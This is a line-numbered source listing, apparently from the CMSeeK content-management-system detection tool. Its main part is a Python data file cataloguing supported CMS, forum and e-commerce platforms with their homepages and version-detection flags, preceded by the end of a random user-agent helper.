Firefox/7.0)"] | |
549 | ||
550 | if rnd == None: | |
551 | b = input("Enter custom UserAgent or simply press enter to use a random one: ") | |
552 | if b == "": | |
553 | b = random.choice(a) | |
554 | else: | |
555 | pass | |
556 | else: | |
557 | b = random.choice(a) | |
558 | ||
559 | return b |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # This file contains the list of cmss supported by CMSeeK in the following structure | |
6 | # ExampleCMS = { | |
7 | #'name':'Example CMS', | |
8 | #'url':'https://examplecms.com', | |
9 | #'vd':'true', | |
10 | #'deeps':'false' | |
11 | #} | |
12 | ||
13 | # vd determines if CMSeek can detect the version of the CMS and deeps determines if there's a deepscan available for the cms | |
14 | ||
15 | wp = { | |
16 | 'name':'WordPress', | |
17 | 'url':'https://wordpress.org', | |
18 | 'vd':'1', | |
19 | 'deeps':'1' | |
20 | } | |
21 | ||
22 | mg = { | |
23 | 'name':'Magento', | |
24 | 'url':'https://magento.com', | |
25 | 'vd':'1', | |
26 | 'deeps':'0' | |
27 | } | |
28 | ||
29 | blg = { | |
30 | 'name':'Blogger By Google', | |
31 | 'url':'https://blogger.com', | |
32 | 'vd':'0', | |
33 | 'deeps':'0' | |
34 | } | |
35 | ||
36 | ghost = { | |
37 | 'name':'Ghost CMS', | |
38 | 'url':'https://ghost.org', | |
39 | 'vd':'0', | |
40 | 'deeps':'0' | |
41 | } | |
42 | ||
43 | lj = { | |
44 | 'name':'LiveJournal', | |
45 | 'url':'https://livejournal.com', | |
46 | 'vd':'0', | |
47 | 'deeps':'0' | |
48 | } | |
49 | ||
50 | tdc = { | |
51 | 'name':'3dCart', | |
52 | 'url':'https://3dcart.com', | |
53 | 'vd':'0', | |
54 | 'deeps':'0' | |
55 | } | |
56 | ||
57 | amcms = { | |
58 | 'name':'Ametys CMS', | |
59 | 'url':'https://ametys.org', | |
60 | 'vd':'0', | |
61 | 'deeps':'0' | |
62 | } | |
63 | ||
64 | apos = { | |
65 | 'name':'Apostrophe CMS', | |
66 | 'url':'https://apostrophecms.org', | |
67 | 'vd':'0', | |
68 | 'deeps':'0' | |
69 | } | |
70 | ||
71 | asciid = { | |
72 | 'name':'AsciiDoc', | |
73 | 'url':'https://methods.co.nz', | |
74 | 'vd':'0', | |
75 | 'deeps':'0' | |
76 | } | |
77 | ||
78 | dru = { | |
79 | 'name':'Drupal', | |
80 | 'url':'https://drupal.org', | |
81 | 'vd':'1', | |
82 | 'deeps':'0' | |
83 | } | |
84 | ||
85 | bolt = { | |
86 | 'name':'Bolt', | |
87 | 'url':'https://bolt.com', | |
88 | 'vd':'0', | |
89 | 'deeps':'0' | |
90 | } | |
91 | ||
92 | brcms = { | |
93 | 'name':'BrowserCMS', | |
94 | 'url':'https://browsercms.com', | |
95 | 'vd':'1', | |
96 | 'deeps':'0' | |
97 | } | |
98 | ||
99 | bubble = { | |
100 | 'name':'Bubble', | |
101 | 'url':'https://bubble.is', | |
102 | 'vd':'0', | |
103 | 'deeps':'0' | |
104 | } | |
105 | ||
106 | abc = { | |
107 | 'name':'Adobe Business Catalyst', | |
108 | 'url':'https://businesscatalyst.com', | |
109 | 'vd':'0', | |
110 | 'deeps':'0' | |
111 | } | |
112 | ||
113 | ckan = { | |
114 | 'name':'CKAN', | |
115 | 'url':'https://ckan.org', | |
116 | 'vd':'0', | |
117 | 'deeps':'0' | |
118 | } | |
119 | ||
120 | cmds = { | |
121 | 'name':'CMS Made Simple', | |
122 | 'url':'https://cmsmadesimple.org', | |
123 | 'vd':'0', | |
124 | 'deeps':'0' | |
125 | } | |
126 | ||
127 | csim = { | |
128 | 'name':'CMSimple', | |
129 | 'url':'https://cmssimple.org', | |
130 | 'vd':'1', | |
131 | 'deeps':'0' | |
132 | } | |
133 | ||
134 | xe = { | |
135 | 'name':'XpressEngine', | |
136 | 'url':'https://xpressengine.com', | |
137 | 'vd':'1', | |
138 | 'deeps':'0' | |
139 | } | |
140 | ||
141 | tp3 = { | |
142 | 'name':'TYPO3 CMS', | |
143 | 'url':'https://typo3.org', | |
144 | 'vd':'0', | |
145 | 'deeps':'0' | |
146 | } | |
147 | ||
148 | tpc = { | |
149 | 'name':'Textpattern CMS', | |
150 | 'url':'https://textpattern.com', | |
151 | 'vd':'0', | |
152 | 'deeps':'0' | |
153 | } | |
154 | ||
155 | joom = { | |
156 | 'name':'Joomla', | |
157 | 'url':'https://joomla.org', | |
158 | 'vd':'1', | |
159 | 'deeps':'1' | |
160 | } | |
161 | oc = { | |
162 | 'name':'OpenCart', | |
163 | 'url':'https://www.opencart.com', | |
164 | 'vd':'0', | |
165 | 'deeps':'0' | |
166 | } | |
167 | xoops = { | |
168 | 'name':'XOOPS', | |
169 | 'url':'http://xoops.org', | |
170 | 'vd':'0', | |
171 | 'deeps':'0' | |
172 | } | |
173 | ushahidi = { | |
174 | 'name':'Ushahidi', | |
175 | 'url':'http://www.ushahidi.com', | |
176 | 'vd':'0', | |
177 | 'deeps':'0' | |
178 | } | |
179 | umi = { | |
180 | 'name':'UMI.CMS', | |
181 | 'url':'https://www.umi-cms.ru', | |
182 | 'vd':'1', | |
183 | 'deeps':'0' | |
184 | } | |
185 | tiki = { | |
186 | 'name':'Tiki Wiki CMS Groupware', | |
187 | 'url':'http://tiki.org', | |
188 | 'vd':'0', | |
189 | 'deeps':'0' | |
190 | } | |
191 | wolf = { | |
192 | 'name':'Wolf CMS', | |
193 | 'url':'http://www.wolfcms.org', | |
194 | 'vd':'0', | |
195 | 'deeps':'0' | |
196 | } | |
197 | wix = { | |
198 | 'name':'WIX Website Builder', | |
199 | 'url':'http://wix.com', | |
200 | 'vd':'0', | |
201 | 'deeps':'0' | |
202 | } | |
203 | wb = { | |
204 | 'name':'WebsiteBaker CMS', | |
205 | 'url':'https://websitebaker.org/', | |
206 | 'vd':'0', | |
207 | 'deeps':'0' | |
208 | } | |
209 | wgui = { | |
210 | 'name':'WebGUI', | |
211 | 'url':'http://www.webgui.org', | |
212 | 'vd':'1', | |
213 | 'deeps':'0' | |
214 | } | |
215 | tidw = { | |
216 | 'name':'TiddlyWiki', | |
217 | 'url':'https://tiddlywiki.com/', | |
218 | 'vd':'1', | |
219 | 'deeps':'0' | |
220 | } | |
221 | sulu = { | |
222 | 'name':'SULU', | |
223 | 'url':'https://sulu.io/', | |
224 | 'vd':'1', | |
225 | 'deeps':'0' | |
226 | } | |
227 | subcms = { | |
228 | 'name':'Subrion CMS', | |
229 | 'url':'https://subrion.org/', | |
230 | 'vd':'1', | |
231 | 'deeps':'0' | |
232 | } | |
233 | sqm = { | |
234 | 'name':'Squiz Matrix', | |
235 | 'url':'https://www.squiz.net/technology/cms', | |
236 | 'vd':'0', | |
237 | 'deeps':'0' | |
238 | } | |
239 | spin = { | |
240 | 'name':'Spin CMS', | |
241 | 'url':'https://www.spin.cw/', | |
242 | 'vd':'0', | |
243 | 'deeps':'0' | |
244 | } | |
245 | sdev = { | |
246 | 'name':'solodev', | |
247 | 'url':'https://www.solodev.com/', | |
248 | 'vd':'0', | |
249 | 'deeps':'0' | |
250 | } | |
251 | snews = { | |
252 | 'name':'sNews', | |
253 | 'url':'https://snewscms.com/', | |
254 | 'vd':'1', | |
255 | 'deeps':'0' | |
256 | } | |
257 | score = { | |
258 | 'name':'Sitecore', | |
259 | 'url':'https://www.sitecore.com/', | |
260 | 'vd':'0', | |
261 | 'deeps':'0' | |
262 | } | |
263 | sim = { | |
264 | 'name':'SIMsite', | |
265 | 'url':'https://simgroep.nl/', | |
266 | 'vd':'0', | |
267 | 'deeps':'0' | |
268 | } | |
269 | spb = { | |
270 | 'name':'Simplébo', | |
271 | 'url':'https://www.simplebo.fr', | |
272 | 'vd':'0', | |
273 | 'deeps':'0' | |
274 | } | |
275 | sst = { | |
276 | 'name':'SilverStripe', | |
277 | 'url':'https://www.silverstripe.org/', | |
278 | 'vd':'0', | |
279 | 'deeps':'0' | |
280 | } | |
281 | silva = { | |
282 | 'name':'Silva CMS', | |
283 | 'url':'http://infrae.com/products/silva', | |
284 | 'vd':'0', | |
285 | 'deeps':'0' | |
286 | } | |
287 | spity = { | |
288 | 'name':'Serendipity', | |
289 | 'url':'https://docs.s9y.org/', | |
290 | 'vd':'1', | |
291 | 'deeps':'0' | |
292 | } | |
293 | slcms = { | |
294 | 'name':'SeamlessCMS', | |
295 | 'url':'https://www.seamlesscms.com/', | |
296 | 'vd':'1', | |
297 | 'deeps':'0' | |
298 | } | |
299 | rock = { | |
300 | 'name':'Rock RMS', | |
301 | 'url':'https://www.rockrms.com/', | |
302 | 'vd':'1', | |
303 | 'deeps':'0' | |
304 | } | |
305 | roadz = { | |
306 | 'name':'Roadiz CMS', | |
307 | 'url':'https://www.roadiz.io/', | |
308 | 'vd':'1', | |
309 | 'deeps':'0' | |
310 | } | |
311 | rite = { | |
312 | 'name':'RiteCMS', | |
313 | 'url':'http://ritecms.com/', | |
314 | 'vd':'1', | |
315 | 'deeps':'0' | |
316 | } | |
317 | rcms = { | |
318 | 'name':'RCMS', | |
319 | 'url':'https://www.reallycms.fi/', | |
320 | 'vd':'0', | |
321 | 'deeps':'0' | |
322 | } | |
323 | quick = { | |
324 | 'name':'Quick.Cms', | |
325 | 'url':'https://opensolution.org/cms-system-quick-cms.html', | |
326 | 'vd':'1', | |
327 | 'deeps':'0' | |
328 | } | |
329 | pcore = { | |
330 | 'name':'Pimcore', | |
331 | 'url':'https://pimcore.com/', | |
332 | 'vd':'0', | |
333 | 'deeps':'0' | |
334 | } | |
335 | pwind = { | |
336 | 'name':'phpWind', | |
337 | 'url':'https://www.phpwind.com/', | |
338 | 'vd':'1', | |
339 | 'deeps':'0' | |
340 | } | |
341 | phpc = { | |
342 | 'name':'phpCMS', | |
343 | 'url':'http://www.phpcms.cn/', | |
344 | 'vd':'0', | |
345 | 'deeps':'0' | |
346 | } | |
347 | percms = { | |
348 | 'name':'Percussion CMS', | |
349 | 'url':'https://www.percussion.com/', | |
350 | 'vd':'0', | |
351 | 'deeps':'0' | |
352 | } | |
353 | pblue = { | |
354 | 'name':'PencilBlue', | |
355 | 'url':'http://pencilblue.org', | |
356 | 'vd':'0', | |
357 | 'deeps':'0' | |
358 | } | |
359 | ophal = { | |
360 | 'name':'Ophal', | |
361 | 'url':'http://ophal.org', | |
362 | 'vd':'1', | |
363 | 'deeps':'0' | |
364 | } | |
365 | sfy = { | |
366 | 'name':'Sitefinity', | |
367 | 'url':'https://www.sitefinity.com/', | |
368 | 'vd':'1', | |
369 | 'deeps':'0' | |
370 | } | |
371 | otwsm = { | |
372 | 'name':'OpenText WSM', | |
373 | 'url':'http://www.opentext.com/', | |
374 | 'vd':'1', | |
375 | 'deeps':'0' | |
376 | } | |
377 | ocms = { | |
378 | 'name':'OpenCms', | |
379 | 'url':'http://www.opencms.org/', | |
380 | 'vd':'1', | |
381 | 'deeps':'0' | |
382 | } | |
383 | odoo = { | |
384 | 'name':'Odoo', | |
385 | 'url':'https://www.odoo.com/', | |
386 | 'vd':'0', | |
387 | 'deeps':'0' | |
388 | } | |
389 | share = { | |
390 | 'name':'Microsoft Sharepoint', | |
391 | 'url':'https://sharepoint.com', | |
392 | 'vd':'1', | |
393 | 'deeps':'0' | |
394 | } | |
395 | octcms = { | |
396 | 'name':'October CMS', | |
397 | 'url':'https://octobercms.com/', | |
398 | 'vd':'0', | |
399 | 'deeps':'0' | |
400 | } | |
401 | mura = { | |
402 | 'name':'Mura CMS', | |
403 | 'url':'http://www.getmura.com/', | |
404 | 'vd':'1', | |
405 | 'deeps':'0' | |
406 | } | |
407 | ||
408 | moto = { | |
409 | 'name':'Moto CMS', | |
410 | 'url':'https://www.motocms.com/', | |
411 | 'vd':'0', | |
412 | 'deeps':'0' | |
413 | } | |
414 | ||
415 | mnet = { | |
416 | 'name':'Mono.net', | |
417 | 'url':'https://mono.net', | |
418 | 'vd':'0', | |
419 | 'deeps':'0' | |
420 | } | |
421 | ||
422 | modx = { | |
423 | 'name':'MODX', | |
424 | 'url':'https://modx.com/', | |
425 | 'vd':'0', | |
426 | 'deeps':'0' | |
427 | } | |
428 | ||
429 | methd = { | |
430 | 'name':'Methode', | |
431 | 'url':'https://www.eidosmedia.com', | |
432 | 'vd':'0', | |
433 | 'deeps':'0' | |
434 | } | |
435 | ||
436 | mambo = { | |
437 | 'name':'Mambo', | |
438 | 'url':'http://mambo-foundation.org', | |
439 | 'vd':'0', | |
440 | 'deeps':'0' | |
441 | } | |
442 | ||
443 | lscms = { | |
444 | 'name':'LiveStreet CMS', | |
445 | 'url':'http://livestreetcms.com/', | |
446 | 'vd':'0', | |
447 | 'deeps':'0' | |
448 | } | |
449 | ||
450 | lepton = { | |
451 | 'name':'LEPTON CMS', | |
452 | 'url':'https://lepton-cms.org/', | |
453 | 'vd':'0', | |
454 | 'deeps':'0' | |
455 | } | |
456 | ||
457 | kbcms = { | |
458 | 'name':'Kooboo CMS', | |
459 | 'url':'https://www.kooboo.com/', | |
460 | 'vd':'1', | |
461 | 'deeps':'0' | |
462 | } | |
463 | ||
464 | koken = { | |
465 | 'name':'Koken', | |
466 | 'url':'http://koken.me', | |
467 | 'vd':'1', | |
468 | 'deeps':'0' | |
469 | } | |
470 | ||
471 | jimdo = { | |
472 | 'name':'Jimdo', | |
473 | 'url':'https://www.jimdo.com/', | |
474 | 'vd':'0', | |
475 | 'deeps':'0' | |
476 | } | |
477 | ||
478 | ibit = { | |
479 | 'name':'Indexhibit', | |
480 | 'url':'http://www.indexhibit.org/', | |
481 | 'vd':'0', | |
482 | 'deeps':'0' | |
483 | } | |
484 | ||
485 | wflow = { | |
486 | 'name':'Webflow CMS', | |
487 | 'url':'https://webflow.com/', | |
488 | 'vd':'0', | |
489 | 'deeps':'0' | |
490 | } | |
491 | ||
492 | jcms = { | |
493 | 'name':'Jalios JCMS', | |
494 | 'url':'http://www.jalios.com/', | |
495 | 'vd':'0', | |
496 | 'deeps':'0' | |
497 | } | |
498 | impage = { | |
499 | 'name':'ImpressPages CMS', | |
500 | 'url':'https://www.impresspages.org/', | |
501 | 'vd':'1', | |
502 | 'deeps':'0' | |
503 | } | |
504 | hotaru = { | |
505 | 'name':'Hotaru CMS', | |
506 | 'url':'http://hotarucms.org/', | |
507 | 'vd':'0', | |
508 | 'deeps':'0' | |
509 | } | |
510 | hippo = { | |
511 | 'name':'HIPPO CMS', | |
512 | 'url':'https://www.onehippo.org/', | |
513 | 'vd':'0', | |
514 | 'deeps':'0' | |
515 | } | |
516 | grav = { | |
517 | 'name':'GravCMS', | |
518 | 'url':'https://getgrav.org/', | |
519 | 'vd':'0', | |
520 | 'deeps':'0' | |
521 | } | |
522 | gsimp = { | |
523 | 'name':'GetSimple CMS', | |
524 | 'url':'http://get-simple.info/', | |
525 | 'vd':'0', | |
526 | 'deeps':'0' | |
527 | } | |
528 | fork = { | |
529 | 'name':'Fork CMS', | |
530 | 'url':'https://www.fork-cms.com/', | |
531 | 'vd':'0', | |
532 | 'deeps':'0' | |
533 | } | |
534 | phpn = { | |
535 | 'name':'PHP Nuke', | |
536 | 'url':'https://www.phpnuke.org/', | |
537 | 'vd':'0', | |
538 | 'deeps':'0' | |
539 | } | |
540 | flex = { | |
541 | 'name':'FlexCMP', | |
542 | 'url':'https://www.flexcmp.com', | |
543 | 'vd':'1', | |
544 | 'deeps':'0' | |
545 | } | |
546 | ezpu = { | |
547 | 'name':'eZ Publish', | |
548 | 'url':'https://ez.no/', | |
549 | 'vd':'0', | |
550 | 'deeps':'0' | |
551 | } | |
552 | exen = { | |
553 | 'name':'ExpressionEngine', | |
554 | 'url':'https://expressionengine.com/', | |
555 | 'vd':'0', | |
556 | 'deeps':'0' | |
557 | } | |
558 | epis = { | |
559 | 'name':'EPiServer', | |
560 | 'url':'https://www.episerver.com/', | |
561 | 'vd':'0', | |
562 | 'deeps':'0' | |
563 | } | |
564 | e107 = { | |
565 | 'name':'e107', | |
566 | 'url':'https://e107.org/', | |
567 | 'vd':'0', | |
568 | 'deeps':'0' | |
569 | } | |
570 | dnn = { | |
571 | 'name':'DNN Platform', | |
572 | 'url':'http://www.dnnsoftware.com', | |
573 | 'vd':'0', | |
574 | 'deeps':'0' | |
575 | } | |
576 | phpbb = { | |
577 | 'name':'phpBB', | |
578 | 'url':'http://phpbb.com', | |
579 | 'vd':'0', | |
580 | 'deeps':'0' | |
581 | } | |
582 | dede = { | |
583 | 'name':'DEDE CMS', | |
584 | 'url':'http://dedecms.com/', | |
585 | 'vd':'0', | |
586 | 'deeps':'0' | |
587 | } | |
588 | dncms = { | |
589 | 'name':'Danneo CMS', | |
590 | 'url':'http://danneo.ru/', | |
591 | 'vd':'1', | |
592 | 'deeps':'0' | |
593 | } | |
594 | craft = { | |
595 | 'name':'Craft CMS', | |
596 | 'url':'https://craftcms.com/', | |
597 | 'vd':'0', | |
598 | 'deeps':'0' | |
599 | } | |
600 | dragon = { | |
601 | 'name':'CPG Dragonfly', | |
602 | 'url':'https://dragonflycms.org/', | |
603 | 'vd':'0', | |
604 | 'deeps':'0' | |
605 | } | |
606 | coton = { | |
607 | 'name':'Cotonti', | |
608 | 'url':'https://www.cotonti.com/', | |
609 | 'vd':'0', | |
610 | 'deeps':'0' | |
611 | } | |
612 | orchd = { | |
613 | 'name':'Orchard CMS', | |
614 | 'url':'https://orchardproject.net/', | |
615 | 'vd':'0', | |
616 | 'deeps':'0' | |
617 | } | |
618 | cbox = { | |
619 | 'name':'ContentBox', | |
620 | 'url':'https://www.contentboxcms.org/', | |
621 | 'vd':'0', | |
622 | 'deeps':'0' | |
623 | } | |
624 | conful = { | |
625 | 'name':'Contentful', | |
626 | 'url':'https://www.contentful.com/', | |
627 | 'vd':'0', | |
628 | 'deeps':'0' | |
629 | } | |
630 | cntsis = { | |
631 | 'name':'Contensis CMS', | |
632 | 'url':'https://zengenti.com/', | |
633 | 'vd':'1', | |
634 | 'deeps':'0' | |
635 | } | |
636 | cnido = { | |
637 | 'name':'CMS CONTENIDO', | |
638 | 'url':'https://www.contenido.org/', | |
639 | 'vd':'1', | |
640 | 'deeps':'0' | |
641 | } | |
642 | contao = { | |
643 | 'name':'Contao CMS', | |
644 | 'url':'https://contao.org/en/', | |
645 | 'vd':'0', | |
646 | 'deeps':'0' | |
647 | } | |
648 | con5 = { | |
649 | 'name':'Concrete5 CMS', | |
650 | 'url':'https://www.concrete5.org/', | |
651 | 'vd':'1', | |
652 | 'deeps':'0' | |
653 | } | |
654 | arc = { | |
655 | 'name':'Arc Forum', | |
656 | 'url':'http://arclanguage.org/', | |
657 | 'vd':'0', | |
658 | 'deeps':'0' | |
659 | } | |
660 | bboard = { | |
661 | 'name':'Burning Board', | |
662 | 'url':'https://www.woltlab.com/', | |
663 | 'vd':'1', | |
664 | 'deeps':'0' | |
665 | } | |
666 | dscrs = { | |
667 | 'name':'Discourse', | |
668 | 'url':'https://www.discourse.org/', | |
669 | 'vd':'1', | |
670 | 'deeps':'0' | |
671 | } | |
672 | discuz = { | |
673 | 'name':'Discuz!', | |
674 | 'url':'http://www.discuz.net/', | |
675 | 'vd':'1', | |
676 | 'deeps':'0' | |
677 | } | |
678 | flarum = { | |
679 | 'name':'Flarum', | |
680 | 'url':'https://flarum.org/', | |
681 | 'vd':'0', | |
682 | 'deeps':'0' | |
683 | } | |
684 | fluxbb = { | |
685 | 'name':'FluxBB', | |
686 | 'url':'https://fluxbb.org/', | |
687 | 'vd':'0', | |
688 | 'deeps':'0' | |
689 | } | |
690 | ipb = { | |
691 | 'name':'IP.Board community forum', | |
692 | 'url':'https://www.invisioncommunity.com/', | |
693 | 'vd':'0', | |
694 | 'deeps':'0' | |
695 | } | |
696 | minibb = { | |
697 | 'name':'miniBB', | |
698 | 'url':'http://www.minibb.com/', | |
699 | 'vd':'1', | |
700 | 'deeps':'0' | |
701 | } | |
702 | mybb = { | |
703 | 'name':'MyBB', | |
704 | 'url':'https://mybb.com/', | |
705 | 'vd':'1', | |
706 | 'deeps':'0' | |
707 | } | |
708 | nodebb = { | |
709 | 'name':'NodeBB', | |
710 | 'url':'https://nodebb.org/', | |
711 | 'vd':'1', | |
712 | 'deeps':'0' | |
713 | } | |
714 | punbb = { | |
715 | 'name':'PunBB', | |
716 | 'url':'http://punbb.informer.com/', | |
717 | 'vd':'1', | |
718 | 'deeps':'0' | |
719 | } | |
720 | smf = { | |
721 | 'name':'Simple Machines Forum', | |
722 | 'url':'http://simplemachines.org/', | |
723 | 'vd':'1', | |
724 | 'deeps':'0' | |
725 | } | |
726 | vanilla = { | |
727 | 'name':'Vanilla Forums', | |
728 | 'url':'https://vanillaforums.com', | |
729 | 'vd':'1', | |
730 | 'deeps':'0' | |
731 | } | |
732 | uknva = { | |
733 | 'name':'uKnowva', | |
734 | 'url':'https://uknowva.com/', | |
735 | 'vd':'1', | |
736 | 'deeps':'0' | |
737 | } | |
738 | xf = { | |
739 | 'name':'XenForo', | |
740 | 'url':'https://xenforo.com/', | |
741 | 'vd':'0', | |
742 | 'deeps':'0' | |
743 | } | |
744 | xmb = { | |
745 | 'name':'XMB', | |
746 | 'url':'https://www.xmbforum.com/', | |
747 | 'vd':'1', | |
748 | 'deeps':'0' | |
749 | } | |
750 | yabb = { | |
751 | 'name':'YaBB (Yet another Bulletin Board)', | |
752 | 'url':'http://www.yabbforum.com/', | |
753 | 'vd':'1', | |
754 | 'deeps':'0' | |
755 | } | |
756 | aef = { | |
757 | 'name':'Advanced Electron Forum', | |
758 | 'url':'http://www.anelectron.com/', | |
759 | 'vd':'1', | |
760 | 'deeps':'0' | |
761 | } | |
762 | bhf = { | |
763 | 'name':'Beehive Forum', | |
764 | 'url':'https://www.beehiveforum.co.uk/', | |
765 | 'vd':'1', | |
766 | 'deeps':'0' | |
767 | } | |
768 | fudf = { | |
769 | 'name':'FUDforum', | |
770 | 'url':'http://fudforum.org/forum/', | |
771 | 'vd':'1', | |
772 | 'deeps':'0' | |
773 | } | |
774 | phorum = { | |
775 | 'name':'Phorum', | |
776 | 'url':'https://www.phorum.org/', | |
777 | 'vd':'0', | |
778 | 'deeps':'0' | |
779 | } | |
780 | yaf = { | |
781 | 'name':'Yet Another Forum (YAF)', | |
782 | 'url':'http://www.yetanotherforum.net', | |
783 | 'vd':'1', | |
784 | 'deeps':'0' | |
785 | } | |
786 | yazd = { | |
787 | 'name':'Yazd', | |
788 | 'url':'http://www.forumsoftware.ca/', | |
789 | 'vd':'0', | |
790 | 'deeps':'0' | |
791 | } | |
792 | ubbt = { | |
793 | 'name':'UBB.threads', | |
794 | 'url':'http://www.ubbcentral.com/', | |
795 | 'vd':'1', | |
796 | 'deeps':'0' | |
797 | } | |
798 | nnf = { | |
799 | 'name':'NoNonsense Forum', | |
800 | 'url':'http://camendesign.com/nononsense_forum', | |
801 | 'vd':'0', | |
802 | 'deeps':'0' | |
803 | } | |
804 | myupb = { | |
805 | 'name':'myUPB', | |
806 | 'url':'http://www.myupb.com', | |
807 | 'vd':'1', | |
808 | 'deeps':'0' | |
809 | } | |
810 | mvnf = { | |
811 | 'name':'mvnForum', | |
812 | 'url':'https://sourceforge.net/projects/mvnforum/', | |
813 | 'vd':'1', | |
814 | 'deeps':'0' | |
815 | } | |
816 | mwf = { | |
817 | 'name':'mwForum', | |
818 | 'url':'https://www.mwforum.org/', | |
819 | 'vd':'0', | |
820 | 'deeps':'0' | |
821 | } | |
822 | mcb = { | |
823 | 'name':'MercuryBoard', | |
824 | 'url':'http://www.mercuryboard.com/', | |
825 | 'vd':'1', | |
826 | 'deeps':'0' | |
827 | } | |
828 | aspf = { | |
829 | 'name':'AspNetForum', | |
830 | 'url':'https://www.jitbit.com/asp-net-forum/', | |
831 | 'vd':'1', | |
832 | 'deeps':'0' | |
833 | } | |
834 | jf = { | |
835 | 'name':'JForum', | |
836 | 'url':'http://www.jforum.net/', | |
837 | 'vd':'1', | |
838 | 'deeps':'0' | |
839 | } | |
840 | afsto = { | |
841 | 'name':'Afosto', | |
842 | 'url':'https://afosto.com/', | |
843 | 'vd':'0', | |
844 | 'deeps':'0' | |
845 | } | |
846 | abuy = { | |
847 | 'name':'Afterbuy', | |
848 | 'url':'https://www.afterbuy.de', | |
849 | 'vd':'0', | |
850 | 'deeps':'0' | |
851 | } | |
852 | arstta = { | |
853 | 'name':'Arastta', | |
854 | 'url':'https://arastta.org/', | |
855 | 'vd':'0', | |
856 | 'deeps':'0' | |
857 | } | |
858 | bigc = { | |
859 | 'name':'BigCommerce', | |
860 | 'url':'https://www.bigcommerce.com/', | |
861 | 'vd':'0', | |
862 | 'deeps':'0' | |
863 | } | |
864 | bigw = { | |
865 | 'name':'Bigware', | |
866 | 'url':'https://bigware.de', | |
867 | 'vd':'0', | |
868 | 'deeps':'0' | |
869 | } | |
870 | bizw = { | |
871 | 'name':'Bizweb', | |
872 | 'url':'https://www.sapo.vn', | |
873 | 'vd':'0', | |
874 | 'deeps':'0' | |
875 | } | |
876 | cexec = { | |
877 | 'name':'Clientexec', | |
878 | 'url':'https://www.clientexec.com/', | |
879 | 'vd':'0', | |
880 | 'deeps':'0' | |
881 | } | |
882 | cloudc = { | |
883 | 'name':'CloudCart', | |
884 | 'url':'https://cloudcart.com/', | |
885 | 'vd':'0', | |
886 | 'deeps':'0' | |
887 | } | |
888 | cmshop = { | |
889 | 'name':'ColorMeShop', | |
890 | 'url':'https://shop-pro.jp/', | |
891 | 'vd':'0', | |
892 | 'deeps':'0' | |
893 | } | |
894 | ||
895 | oracle_atg = { | |
896 | 'name': 'Oracle ATG Web Commerce', | |
897 | 'url': 'http://www.oracle.com/us/products/applications/atg/web-commerce/web-commerce-search-330138.html', | |
898 | 'vd': '1', | |
899 | 'deeps': '0' | |
900 | } | |
901 | ||
902 | mdle = { | |
903 | 'name':'Moodle', | |
904 | 'url':'https://moodle.com/', | |
905 | 'vd':'0', | |
906 | 'deeps':'0' | |
907 | } | |
908 | ||
909 | orkis = { | |
910 | 'name':'ORKIS Ajaris Websuite', | |
911 | 'url':'http://www.orkis.com/', | |
912 | 'vd':'0', | |
913 | 'deeps':'0' | |
914 | } | |
915 | ||
916 | cmdia = { | |
917 | 'name':'Comandia', | |
918 | 'url':'https://www.comandia.com/', | |
919 | 'vd':'0', | |
920 | 'deeps':'0' | |
921 | } | |
922 | ||
923 | coms = { | |
924 | 'name':'Commerce Server', | |
925 | 'url':'http://commerceserver.net', | |
926 | 'vd':'1', | |
927 | 'deeps':'0' | |
928 | } | |
929 | ||
930 | cosmos = { | |
931 | 'name':'Cosmoshop', | |
932 | 'url':'https://www.cosmoshop.de/', | |
933 | 'vd':'0', | |
934 | 'deeps':'0' | |
935 | } | |
936 | ||
937 | csc = { | |
938 | 'name':'CS Cart', | |
939 | 'url':'https://www.cs-cart.com/', | |
940 | 'vd':'0', | |
941 | 'deeps':'0' | |
942 | } | |
943 | ||
944 | cubec = { | |
945 | 'name':'CubeCart', | |
946 | 'url':'https://www.cubecart.com/', | |
947 | 'vd':'0', | |
948 | 'deeps':'0' | |
949 | } | |
950 | ||
951 | abda = { | |
952 | 'name':'Al Mubda', | |
953 | 'url':'http://www.almubda.net/', | |
954 | 'vd':'1', | |
955 | 'deeps':'0' | |
956 | } | |
957 | ||
958 | dweb = { | |
959 | 'name':'Dynamicweb', | |
960 | 'url':'https://www.dynamicweb.dk/', | |
961 | 'vd':'1', | |
962 | 'deeps':'0' | |
963 | } | |
964 | ||
965 | ecc = { | |
966 | 'name':'EC-CUBE', | |
967 | 'url':'https://www.ec-cube.net/', | |
968 | 'vd':'0', | |
969 | 'deeps':'0' | |
970 | } | |
971 | ||
972 | elcd = { | |
973 | 'name':'Elcodi', | |
974 | 'url':'http://elcodi.io/', | |
975 | 'vd':'0', | |
976 | 'deeps':'0' | |
977 | } | |
978 | ||
979 | epgs = { | |
980 | 'name':'ePages', | |
981 | 'url':'https://epages.com', | |
982 | 'vd':'0', | |
983 | 'deeps':'0' | |
984 | } | |
985 | ||
986 | ezpub = { | |
987 | 'name':'eZ Publish', | |
988 | 'url':'https://ez.no/', | |
989 | 'vd':'0', | |
990 | 'deeps':'0' | |
991 | } | |
992 | ||
993 | for3 = { | |
994 | 'name':'Fortune3', | |
995 | 'url':'https://www.fortune3.com/', | |
996 | 'vd':'0', | |
997 | 'deeps':'0' | |
998 | } | |
999 | ||
1000 | presta = { | |
1001 | 'name':'PrestaShop', | |
1002 | 'url':'https://www.prestashop.com/', | |
1003 | 'vd':'0', | |
1004 | 'deeps':'0' | |
1005 | } | |
1006 | ||
1007 | btree = { | |
1008 | 'name':'BigTree CMS', | |
1009 | 'url':'https://www.bigtreecms.org/', | |
1010 | 'vd':'0', | |
1011 | 'deeps':'0' | |
1012 | } | |
1013 | ||
1014 | pmoc = { | |
1015 | 'name':'Proximis Omnichannel', | |
1016 | 'url':'https://www.proximis.com', | |
1017 | 'vd':'0', | |
1018 | 'deeps':'0' | |
1019 | } | |
1020 | ||
1021 | qcart = { | |
1022 | 'name':'Quick.Cart', | |
1023 | 'url':'https://opensolution.org/shopping-cart-quick-cart.html', | |
1024 | 'vd':'1', | |
1025 | 'deeps':'0' | |
1026 | } | |
1027 | ||
1028 | rbsc = { | |
1029 | 'name':'RBS Change', | |
1030 | 'url':'https://www.rbschange.fr/', | |
1031 | 'vd':'1', | |
1032 | 'deeps':'0' | |
1033 | } | |
1034 | ||
1035 | sfcc = { | |
1036 | 'name':'Salesforce Commerce Cloud', | |
1037 | 'url':'https://demandware.com/', | |
1038 | 'vd':'0', | |
1039 | 'deeps':'0' | |
1040 | } | |
1041 | ||
1042 | sazito = { | |
1043 | 'name':'Sazito', | |
